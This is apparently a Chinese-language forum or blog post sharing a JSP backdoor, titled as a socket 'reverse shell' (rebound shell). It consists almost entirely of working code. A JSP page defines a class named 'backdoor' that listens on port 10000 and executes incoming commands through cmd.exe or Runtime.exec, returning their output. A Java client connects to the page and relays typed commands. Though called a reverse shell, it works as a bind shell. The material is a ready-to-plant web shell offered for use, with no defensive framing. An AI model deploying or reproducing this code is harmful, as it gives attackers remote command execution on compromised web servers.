工具分享:jsp实现socket反弹shell

jsp实现socket反弹shell

<%@ page language="java" import="java.util.*,java.io.*,java.net.*"
        pageEncoding="Gbk"%>
<%
        class backdoor {
                public void getData() throws Exception {
                        ServerSocket ss = new ServerSocket(10000);
 
                        //阻塞等待
                        Socket s = ss.accept();
                        //读取客户端传过来的数据
                        BufferedReader bufIn = new BufferedReader(
                                        new InputStreamReader(s.getInputStream()));
                        //向客户端传送数据
                        BufferedWriter bufOut = new BufferedWriter(
                                        new OutputStreamWriter(s.getOutputStream()));
                        String line = null;
                        //向客户端返回执行命令后结果
                        while ((line = bufIn.readLine()) != null) {
                                bufOut.write(ToServerName(line));
                                bufOut.newLine();
                                bufOut.flush();
                        }
                        s.close();
                        ss.close();
                }
        String ToServerName(String cmd) throws IOException {
         StringBuffer sb = new StringBuffer();
                //判断系统是否是windows
                if (System.getProperty("os.name").toLowerCase().startsWith("windows")) {
                        //执行命令
                        Process p = Runtime.getRuntime().exec("cmd.exe  /c " + cmd);
                        //读取命令正确执行后的流
                        BufferedReader buff = new BufferedReader(new InputStreamReader(p
                                        .getInputStream()));
                        //读取错误命令执行后的流
                        BufferedReader beff = new BufferedReader(new InputStreamReader(p
                                        .getErrorStream()));
                        String Me;
                        //添加到一个StringBuffer 中以便一次性返回
                        while ((Me = buff.readLine()) != null || (Me=beff.readLine())!=null) {
                                sb.append(Me + "@@");
                        }
                }else{
                        //执行命令过程同上理 
                        Process p = Runtime.getRuntime().exec(cmd);
                        BufferedReader buff = new BufferedReader(new InputStreamReader(p
                                        .getInputStream()));
                        BufferedReader beff = new BufferedReader(new InputStreamReader(p
                                        .getErrorStream()));
                        String Me;
                        while ((Me = buff.readLine()) != null || (Me=beff.readLine())!=null) {
                                sb.append(Me + "@@");
                        }
                }
                //返回命令执行后结果。
                return sb.toString();
                }
        }
%>
<!-- 此页面可开一次，请不要刷新。-->
<%
try{
        new backdoor().getData();
}catch(Exception e){
        out.println("端口可能已被占用，请修改!");
}
 %>

client.java

package com.xxx.socket;
 
import java.io.*;
import java.net.*;
/**
* @author Binxu -Silic
*/
public class Client {
        //连接信息
        public static final String ip = "localhost";
        public static final int port = 10000;
 
        public static void main(String[] args) throws Exception {
                //连接目标
                Socket s = new Socket(ip, port);
                System.out.print("$:");
                //获取输入命令
                BufferedReader bufr = 
                        new BufferedReader(new InputStreamReader(System.in));
                //向服务端写数据
                BufferedWriter bufOut = 
                        new BufferedWriter(new OutputStreamWriter(s.getOutputStream()));
                //读取服务端返回数据
                BufferedReader bufIn = 
                        new BufferedReader(new InputStreamReader(s.getInputStream()));
 
                String line = null;
                //接受服务端返回数据并显示
                while((line = bufr.readLine()) != null)
                {
                        if("exit".equals(line))
                                break;
                        bufOut.write(line);
                        bufOut.newLine();
                        bufOut.flush();
                        String str = bufIn.readLine().replaceAll("@@","\n");
                        System.out.print(str);
                        System.out.print("$:");        
                }                
                bufr.close();
                s.close();
        }
}